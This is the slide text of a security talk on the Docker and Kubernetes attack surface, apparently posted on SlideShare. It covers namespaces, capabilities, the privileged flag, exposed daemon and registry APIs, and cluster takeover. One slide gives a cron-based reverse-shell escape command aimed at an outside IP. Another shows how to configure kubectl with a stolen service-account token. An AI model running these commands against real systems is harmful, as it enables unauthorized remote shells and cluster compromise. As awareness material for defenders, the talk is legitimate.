Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Hacking Docker the Easy way

1,434 views

Published on

Attack Surface of Docker

Published in: Technology
  • Be the first to comment

Hacking Docker the Easy way

  1. 1. Hacking Docker the Easy Way
  2. 2. HELLO! I am Oritz A web 🐶 & script 👶 Steam 💖 +1 English is bad
  3. 3. Docker Introduction » Started in 2013 » Written in Go » Very active codebase (~ 33,000 commits & 44,000 stars ) » Lots of interest from Big Tech Co’s ( e.g. Google/Microsoft/RedHat/IBM ) » Delivering Containers as a Service ( e.g. AWS/GKE/Azure/Aliyun ) » More quickly and flexibility than traditional virtualization
  4. 4. Container vs VM
  5. 5. Our process is easy Docker Security Overview Hacking Docker Hacking Container Management Platform
  6. 6. Docker security Overview Namespaces, Cgroups, Capabilities and more
  7. 7. Namespaces Control what a process can see » PID » Mount » Network » UTS » IPS » User Namespaces & Cgroups Cgroups Control what a process can use » Memory » CPU » Devices » Blkio » Net_prio » Freezer » …
  8. 8. Capabilities Break up the monolithic root privilege » Useful for commands that need one privilege » Docker drops all capabilities except those needed » By default, a container own only 14 of 37 capabilities » Docker supports the addition and removal of capabilities » --privileged flag will give extended privileges to the container Kernel Capabilities
  9. 9. Seccomp Control the system calls that a process can make The default seccomp profile provides a sane default for running containers with seccomp and disables around 44 system calls out of 300+ Seccomp & Kernel Modules MAC Give fine grained control to restrict access to system resources » AppArmor » SELinux » GRSEC » TOMOYO » …
  10. 10. “OK, OK, We have known that docker is secure. But how to hack docker? Please show us the exploit.”
  11. 11. Hacking Docker Kernel, Privilege, Daemon and Registry
  12. 12. Am I in A Container? » ps aux » cat /proc/self/attr/current » cat /.dockerenv » cat /proc/self/cgroup » mount » …
  13. 13. Vulnerabilities in Docker images » Heart Bleed » Glibc Ghost » Shell Shock » SSL Death Alert » …
  14. 14. Attack surface of Docker
  15. 15. Linux Kernel Containers share the kernel of the host
  16. 16. DirtyCow Docker Container Escape PoC CVE-2016-5195
  17. 17. CaaS Platform » KVM » XEN » Escape From The Docker KVM-QEMU Machine
  18. 18. Docker in Docker
  19. 19. Privileged
  20. 20. What privileged flag do » Set empty process label » Warn of incompatibility with user namespaces » Add all host devices from /dev » Add device cgroup access rwm allow » Add all capabilities » Clear read only flag for /sys mount » Set read only paths to nil (*specs.Spec).Linux.ReadonlyPaths = nil » Set masked paths to nil (*specs.Spec).Linux.MaskedPaths = nil » Clear read only flag for cgroup mount » Set app armor profile "unconfined"
  21. 21. Have a look at /dev docker run --privileged
  22. 22. Mount Host directory
  23. 23. Docker Daemon The docker group grants privileges equivalent to the root user
  24. 24. Docker Swarm
  25. 25. Docker Remote API docker daemon -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
  26. 26. Docker Registry A server side application that stores and lets you distribute Docker images.
  27. 27. Registry Server Unauth
  28. 28. Pull and Push Download each blob using the API or just run “docker pull xxx.xx/xx”
  29. 29. Hacking Container Management Platform Take Kubernetes as an Example
  30. 30. Kubernetes
  31. 31. API Server Ports
  32. 32. API Server Unauth myapp.yaml » kubectl create -f myapp.yaml » kubectl --namespace=default exec -it myapp bash
  33. 33. Escape Docker » echo -e "* * * * * root bash -i >& /dev/tcp/1.2.3.4/80 0>&1n" >> /mnt/etc/crontab
  34. 34. Service Accounts
  35. 35. Token in Pods
  36. 36. Token in Pods
  37. 37. Hacking Kubernetes » kubectl config set-cluster pwned --server=https://${public_ip} --insecure-skip-tls-verify » kubectl config set-credentials pwn --token=${serviceacount_token} » kubectl config set-context pwned --cluster=pwned --user=pwn » kubectl config use-context pwned
  38. 38. Find 0day in Github issues
  39. 39. There are more interesting problems yet to be solved with docker
  40. 40. How to find next exploit? Read the official documents carefully and Focus on the events of developer community
  41. 41. THANKS! Any questions? You can find me at @oritz https://0x0d.im

×